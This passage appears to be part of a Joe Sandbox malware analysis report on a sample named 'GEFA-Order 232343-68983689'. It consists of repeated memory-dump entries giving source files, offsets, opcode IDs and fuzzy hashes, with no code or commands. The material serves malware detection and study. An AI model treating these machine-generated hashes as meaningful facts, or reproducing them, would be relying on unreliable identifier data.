                                          • Instruction Fuzzy Hash: C0E0DF31C4B204EFC7029BB0E9401E87FB69B86391F2082EAE4086B351C6314E45DB92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 91e52f629ee94962d90892100ca2b558681fa30a227452c19d64d4e8320a20a1
                                          • Instruction ID: 5e5e03051e410cc64fc0fd1034ac171b492312bf12f6ce2d956f490a673d64e3
                                          • Opcode Fuzzy Hash: 91e52f629ee94962d90892100ca2b558681fa30a227452c19d64d4e8320a20a1
                                          • Instruction Fuzzy Hash: F7F0E234A01218DFDB50DF58E88879DBBB2FB48341F1089AAD50AEB340CB785D88CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 668d607d2e033a83e3d101a035239627c083365cb31fdef0640f91f579787f4b
                                          • Instruction ID: 2004a225794849a5ca16c05becb8e724b85c0bae29baef803debe3d56737c1c0
                                          • Opcode Fuzzy Hash: 668d607d2e033a83e3d101a035239627c083365cb31fdef0640f91f579787f4b
                                          • Instruction Fuzzy Hash: CEF01C74904208EFCB40CFA9C440AADBBB8AB49310F14C09AA85897241D6319A11EF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 54208620d02c60da18acfe948b0d6c66aa34570fe882c16a3cfeeadefa0f0ffa
                                          • Instruction ID: b5722d879b1b7c03b13b2954d2f44b1726d2e0ba6d01bb6d966bd72bed2de9f7
                                          • Opcode Fuzzy Hash: 54208620d02c60da18acfe948b0d6c66aa34570fe882c16a3cfeeadefa0f0ffa
                                          • Instruction Fuzzy Hash: 8AF03970E04208EFCB80EFB9D4456ACBBF5EB88300F1481A9E899A7340E6309A00DF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e91b77d3d85727bb6885016c9a808f3d07c4b826e7e65b21a988e62c19cb2c4
                                          • Instruction ID: e181568ebaaac8e6b61b7ec36a7059de19ea6091847eb7487c76f381b8b525a9
                                          • Opcode Fuzzy Hash: 9e91b77d3d85727bb6885016c9a808f3d07c4b826e7e65b21a988e62c19cb2c4
                                          • Instruction Fuzzy Hash: 9EF09235904208EFCB45DF98D945AADBFB6EB48310F10C1A9A81856351D6329A61EF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29921edab7a019be2fa878e20624fe1a4fe8fea77d4b334e093e5d8b96620677
                                          • Instruction ID: b2af988af83d460338ed06031442d7eb6c74ce09cdb3a727236c347567df6a6f
                                          • Opcode Fuzzy Hash: 29921edab7a019be2fa878e20624fe1a4fe8fea77d4b334e093e5d8b96620677
                                          • Instruction Fuzzy Hash: 4CE02230A02344AFCB01DB74A9446A97F73DB85301F02829BE804DB242E9310E009791
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a76b3f0998a99cdeb5c13ab31fef52a686c63730b1c6abac3e4541dd1c469a74
                                          • Instruction ID: 05ce6345c106bcc3e877f7a24204c1a7bd3b0b64abae7c87f59eeec5dcc6c263
                                          • Opcode Fuzzy Hash: a76b3f0998a99cdeb5c13ab31fef52a686c63730b1c6abac3e4541dd1c469a74
                                          • Instruction Fuzzy Hash: 13E0ED74D04208EFCB84DFA8D4519ACFFB9EB48310F10C09AEC5897341E6319A55DF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a31967d38b933903bc11c44feb5e68f8b8842d6ab3a804944c2acfbc143f99a
                                          • Instruction ID: 0546c5f22c25054cc991a89b6d0c4d2cc5a180cd4f19e254cf2dbe915213dd26
                                          • Opcode Fuzzy Hash: 3a31967d38b933903bc11c44feb5e68f8b8842d6ab3a804944c2acfbc143f99a
                                          • Instruction Fuzzy Hash: B0E0EDB4D04208EFCB44DFA8D4416ACFBF5EF88310F10C0AA981893340D7319A55DF40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a31967d38b933903bc11c44feb5e68f8b8842d6ab3a804944c2acfbc143f99a
                                          • Instruction ID: 6f0bceb07156704b9364321d34cac54f51026f22e3b9da48f2f9aa541173cddb
                                          • Opcode Fuzzy Hash: 3a31967d38b933903bc11c44feb5e68f8b8842d6ab3a804944c2acfbc143f99a
                                          • Instruction Fuzzy Hash: 9DE0EDB4D08208EFCB54DFA8D441AACFBF5EB48310F10C0AAD81893340D7319A55DF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e9f1949e8bff1f9875f42154771b5c77656263531c62d664b506e78fe41f2bcf
                                          • Instruction ID: 4b86ffe0db42bdab1f448d41ae020d7bda052bc0455f385ef67838b7d83ac80e
                                          • Opcode Fuzzy Hash: e9f1949e8bff1f9875f42154771b5c77656263531c62d664b506e78fe41f2bcf
                                          • Instruction Fuzzy Hash: A4F08C30614115CFCB14EF28ECA8B9AB7B1FF95381F140098D01A9B380DB381E80CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a31967d38b933903bc11c44feb5e68f8b8842d6ab3a804944c2acfbc143f99a
                                          • Instruction ID: ba43c42a2281cc8e6ecc055aa33a2fcbd07a3f0483231a2c73540e8338585220
                                          • Opcode Fuzzy Hash: 3a31967d38b933903bc11c44feb5e68f8b8842d6ab3a804944c2acfbc143f99a
                                          • Instruction Fuzzy Hash: 8DE0EDB4D04208EFCB54DFA8D8416ACFBF5EB48314F10C0AAA81893340D7319A51DF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a31967d38b933903bc11c44feb5e68f8b8842d6ab3a804944c2acfbc143f99a
                                          • Instruction ID: e83b8d7457a9fcf2a8a581e490584db28b607af862b4d1ea9deef7fb9cd2a2fe
                                          • Opcode Fuzzy Hash: 3a31967d38b933903bc11c44feb5e68f8b8842d6ab3a804944c2acfbc143f99a
                                          • Instruction Fuzzy Hash: 3BE0EDB4D04208EFCB84DFA9D4416ACFBF5EB49310F10C0AA981893340D735AE51DF45
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: df289cf1e76806ee795e872f1b5ea31f203a444fee58903f1931be72ea42714d
                                          • Instruction ID: 4b0a0a05814ce9224849ff93daa335581cdf963d254bb3dbb995213532d5d554
                                          • Opcode Fuzzy Hash: df289cf1e76806ee795e872f1b5ea31f203a444fee58903f1931be72ea42714d
                                          • Instruction Fuzzy Hash: 1DF0C935D04208FFCB45DFA4D8419ACBFB5EB88310F14C0AAED5956351DA329A61EF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73a60b247a5133b4b1177528df1b45ed09cdeca52d59f17a4c0011cd42a245d4
                                          • Instruction ID: 4501ad72a345bf078eed7fb4a4bfda1fea7d54525b4a9dd480c0159d2e2958b6
                                          • Opcode Fuzzy Hash: 73a60b247a5133b4b1177528df1b45ed09cdeca52d59f17a4c0011cd42a245d4
                                          • Instruction Fuzzy Hash: 2DE0DF7046E344EFCB55CB60C810668BF7CEB47300F1480CED8488B2A2CA329E55DB92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1d2d3b4a672183f0ed6fbb8ccf52a3b8e4545cab7f1194b4065c1f2af434e9bc
                                          • Instruction ID: 184b2aadfbe78480ab70c437a4a6190d8ac89f00cc5702ee8fac70f081937dd6
                                          • Opcode Fuzzy Hash: 1d2d3b4a672183f0ed6fbb8ccf52a3b8e4545cab7f1194b4065c1f2af434e9bc
                                          • Instruction Fuzzy Hash: EFE01A34909208EBCB44DFA4E5456ACBBB1EF49314F208199984927342DA324A13DB96
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 987b21565ebd6639bb1257ce6ef3208922168a61a1a0f10667467cc471afd6c0
                                          • Instruction ID: 2690d0e448b414163c5c04cd992a7dde891a5ff7dc93639958c38a8561e7c533
                                          • Opcode Fuzzy Hash: 987b21565ebd6639bb1257ce6ef3208922168a61a1a0f10667467cc471afd6c0
                                          • Instruction Fuzzy Hash: 7EE01A78D05208EFC744DFA8D451AADFBF9EB48300F20C0AAE95897341DA329A41DF95
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2cca0705fe79acdde7a6a4e7f38ab158e1e35397c8b31d64f08280a7c711a431
                                          • Instruction ID: 5fccfabc9bb327b5683605640d8ceea88562cc17e0c4b9030a07f6731d2bc47c
                                          • Opcode Fuzzy Hash: 2cca0705fe79acdde7a6a4e7f38ab158e1e35397c8b31d64f08280a7c711a431
                                          • Instruction Fuzzy Hash: 7CE0E574D05208EFCB44DFA8D441AADBFB5EB48310F10C0AAEC5857341CA319A51EF95
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2ea75ad1c9753772f9dcec9ea18fb19295517bfb4c1ba729d9665e1726160e8f
                                          • Instruction ID: 14e0ac162c63312df73b870c55eb21e47bdd495829554c39506dcdd1db091f84
                                          • Opcode Fuzzy Hash: 2ea75ad1c9753772f9dcec9ea18fb19295517bfb4c1ba729d9665e1726160e8f
                                          • Instruction Fuzzy Hash: 9EE0C278E04208EFCB84DFA9D444AACBBF5EF48300F1080A9E808A7311D6309A40DF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ddb635fbcc89d2636b6f4e90fbea374b1397645fbf8100e9c2fdfb688d25e3ca
                                          • Instruction ID: ebacd06f6611dac562a73108270835ed50aa7b8bd510b947ba40e0d5fb248d51
                                          • Opcode Fuzzy Hash: ddb635fbcc89d2636b6f4e90fbea374b1397645fbf8100e9c2fdfb688d25e3ca
                                          • Instruction Fuzzy Hash: D0E0E574E04208EFCB84DFA8D5416ACBBF5EB48344F20C0AA982897340D7319A01DF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ddb635fbcc89d2636b6f4e90fbea374b1397645fbf8100e9c2fdfb688d25e3ca
                                          • Instruction ID: 48843842702c59e440fdf3aecac4df371c29396d6ec27d627479df8013e8f233
                                          • Opcode Fuzzy Hash: ddb635fbcc89d2636b6f4e90fbea374b1397645fbf8100e9c2fdfb688d25e3ca
                                          • Instruction Fuzzy Hash: 7EE01A74E04208EFCB84DFA8D5416ACFBF5EB48300F14C0AA982897340D7319A02DF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 010a97b9948fed05c8af96004d5d17c74e43615a130a106943dab5b053bbeafe
                                          • Instruction ID: 76456a224e25106611a5dcffbebe3cf9cf251036744d688e3428deb31c1c6dd8
                                          • Opcode Fuzzy Hash: 010a97b9948fed05c8af96004d5d17c74e43615a130a106943dab5b053bbeafe
                                          • Instruction Fuzzy Hash: F9E0DF30C0E348EFC700DF74E8146B9BF74AF5B300F1080DAD445A7251CA701A15DBAA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f559d7b07187e0f69ee52b552c96f38dc37be099d31dfd982afb9a1f1972174
                                          • Instruction ID: f857ccd962bc7ffd30ada03265cc83a39b02010d7670d0710fac7382d3889fb2
                                          • Opcode Fuzzy Hash: 1f559d7b07187e0f69ee52b552c96f38dc37be099d31dfd982afb9a1f1972174
                                          • Instruction Fuzzy Hash: 43E04FB4908208EBC704DFA4D4419BDBFB8AB49310F10C0AEE84857381CB319A49EB94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9d054bac45f43b206246e1095135831307662116f12a449e212cc90b14611b51
                                          • Instruction ID: fe1b27234bc198ab55568bd21190d55eb892dab235e9a224905258de886d5fd7
                                          • Opcode Fuzzy Hash: 9d054bac45f43b206246e1095135831307662116f12a449e212cc90b14611b51
                                          • Instruction Fuzzy Hash: 3DE0E574D04208EFCB44DFA9D951AACBFB5EB48310F10C0AAA85867341C6319A51EF84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9d054bac45f43b206246e1095135831307662116f12a449e212cc90b14611b51
                                          • Instruction ID: 7bf3597049b5d77ede7a2ae8b3eb0e594b465dcc4c258bbe370d9a77906d6d5a
                                          • Opcode Fuzzy Hash: 9d054bac45f43b206246e1095135831307662116f12a449e212cc90b14611b51
                                          • Instruction Fuzzy Hash: C8E0E574D04208EFCB44DFA8D441AACBFB5EB48310F10C0AAEC5857341C6319A51EF84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b8bbcb76a23e68c6343455e9d335a61d05ccbdac03d64e544fba2416ec6d25b6
                                          • Instruction ID: fb0506ed2a9b9a14e921d742745e01f6c3cd30939ec69984b06c868b2d435b3f
                                          • Opcode Fuzzy Hash: b8bbcb76a23e68c6343455e9d335a61d05ccbdac03d64e544fba2416ec6d25b6
                                          • Instruction Fuzzy Hash: B9D05E7270A1508FC742DB28F9548857B71EBD622131282A3E048CF261D2529D05C760
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 947f908f66c87d9ab205d816b83ba1dfa55f2146d674782ea2d0d7c77e8ed1b1
                                          • Instruction ID: 6298dd3f1addbe9c863a6b1a9ea2dd73a6441a1a8931dab011fdc445fc81d4c6
                                          • Opcode Fuzzy Hash: 947f908f66c87d9ab205d816b83ba1dfa55f2146d674782ea2d0d7c77e8ed1b1
                                          • Instruction Fuzzy Hash: 96E04634D08208EFCB44DFA8D4516BCFBB4EB89300F20C0EAD85857341EA31AA42DF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: df078add0adf567b0f46f3918780bc75652996f1cf9c80557de57e2431c22839
                                          • Instruction ID: 25d6591af23088bf0b9bfe9c6c3e274f6afc3c9022cc726d7b2ece12ef18c20e
                                          • Opcode Fuzzy Hash: df078add0adf567b0f46f3918780bc75652996f1cf9c80557de57e2431c22839
                                          • Instruction Fuzzy Hash: 9CE0B674915208EFC794DFA8D5456BCBBF4EB48215F2080A9D80897341EA319A45DB82
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1ea9d16cf4d6321e9e40076957a4dbe8b78498154f49a813d16a466c49a77ee6
                                          • Instruction ID: 61aefccb1eafa5ba14d364645c14eda5d2551fd1544f8bd6410456895bffeb83
                                          • Opcode Fuzzy Hash: 1ea9d16cf4d6321e9e40076957a4dbe8b78498154f49a813d16a466c49a77ee6
                                          • Instruction Fuzzy Hash: B9E01A74D04208EFC704EBA8D4415ACBBB8EB89301F20C0AAD85857381D7315A01DF40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1ea9d16cf4d6321e9e40076957a4dbe8b78498154f49a813d16a466c49a77ee6
                                          • Instruction ID: c97c829f2242a79679fa23b0d675301559af3676d3ad5a7632441ad15828a4f2
                                          • Opcode Fuzzy Hash: 1ea9d16cf4d6321e9e40076957a4dbe8b78498154f49a813d16a466c49a77ee6
                                          • Instruction Fuzzy Hash: 3DE01A74D04208EFCB08DFA9D8415BCBBB8EB49301F20C0AAE81857381DB315A02EF40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: db4ba17a65b64799152d6e5d2feb80bb2abc50e16c19312e425e11e789f0ab38
                                          • Instruction ID: 8155121edf25cf8e95be5574f8d706c5d0aae0a97a156deda1838dc4b1c45991
                                          • Opcode Fuzzy Hash: db4ba17a65b64799152d6e5d2feb80bb2abc50e16c19312e425e11e789f0ab38
                                          • Instruction Fuzzy Hash: 2EE04674A15208EFCB80DFB8C445AACBFF4EB08300F2081A9E808D7320E6309E40DB51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: deead8bc27e1a9d9bd32ce8e277ce3753d66e4210fc454528f3753d833469847
                                          • Instruction ID: be38551a0e9214baa00a4aa80c24118e935ddeea28854a7c7ca06e521f47f8b5
                                          • Opcode Fuzzy Hash: deead8bc27e1a9d9bd32ce8e277ce3753d66e4210fc454528f3753d833469847
                                          • Instruction Fuzzy Hash: 50E08638904208EFCB04DFA4E8419ACBF75EB49310F10C0A9EC0417340CA719E55DB95
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7907931201b7c0d1e9ee21fad1193882a87cffe4a8eee654fcc323029d4087ff
                                          • Instruction ID: 8e578fb653d9fdfb54ce9e19c7318160a633640bc5eeadc95db3c5f941aee483
                                          • Opcode Fuzzy Hash: 7907931201b7c0d1e9ee21fad1193882a87cffe4a8eee654fcc323029d4087ff
                                          • Instruction Fuzzy Hash: DCF0C034D04259CFEF60CF61C454BBEB7B1BB06301F189499D485A7244CB744A80DF76
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 895f549336d07b3e0d61bc3f54252208437cee1d70285c856ec66c4bdc55f592
                                          • Instruction ID: 6270858309fc9102c3654f353726aa1f5f49d35fb1b91898d63ac6f75a8cf004
                                          • Opcode Fuzzy Hash: 895f549336d07b3e0d61bc3f54252208437cee1d70285c856ec66c4bdc55f592
                                          • Instruction Fuzzy Hash: 76E04F34D04208EFCB44DFA9D4455ACFBB9EB48300F10C0A9D80C57340CA319E01DF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 66bbb08b1035b5726dcb9f4c37c346ee02dc654e3fabfcd4283c1dcc388fc802
                                          • Instruction ID: f8c77d206ae533c403cbafbb57a566494d87142f9ad04fbf803de3360596db83
                                          • Opcode Fuzzy Hash: 66bbb08b1035b5726dcb9f4c37c346ee02dc654e3fabfcd4283c1dcc388fc802
                                          • Instruction Fuzzy Hash: 67D02E31A403109BEFE066B0AC01FA233A89F067E6F100069EA285F2C0CAB2E801C391
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7269f2b0cd2f4e18188171a756b1400c54c4e2727a10769fa3d81ee173b6cf68
                                          • Instruction ID: 5e8d3df9caf0f6640031475597fb38112e8b8d9eb9a4735ba4833467033179cf
                                          • Opcode Fuzzy Hash: 7269f2b0cd2f4e18188171a756b1400c54c4e2727a10769fa3d81ee173b6cf68
                                          • Instruction Fuzzy Hash: 6BF0AC74A04128CFDB54AF58E498B9DB772EB95341F148896D60AA7380CA345E848FA2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a5dbf3ce1bdb1b46783068a464d910011dbf9d69d53d07bff883684af760de7
                                          • Instruction ID: b7cd8116a1de95fc3708f75d01c7ec5d118bb5a738548a92bdcc4d29116baaee
                                          • Opcode Fuzzy Hash: 3a5dbf3ce1bdb1b46783068a464d910011dbf9d69d53d07bff883684af760de7
                                          • Instruction Fuzzy Hash: C9E0B674D15208EFC784EFA8D9556ACBBF9EB49214F6080A9D80C97341EA32AA45DB81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ec88490e8f07c1377b1762890568921c532f3b206919b30e2bf5ed3a6aeb4cc7
                                          • Instruction ID: c86366c04e9ae7f870429be26e8b845bae16f7d700a9abaea27a0aad7ab04440
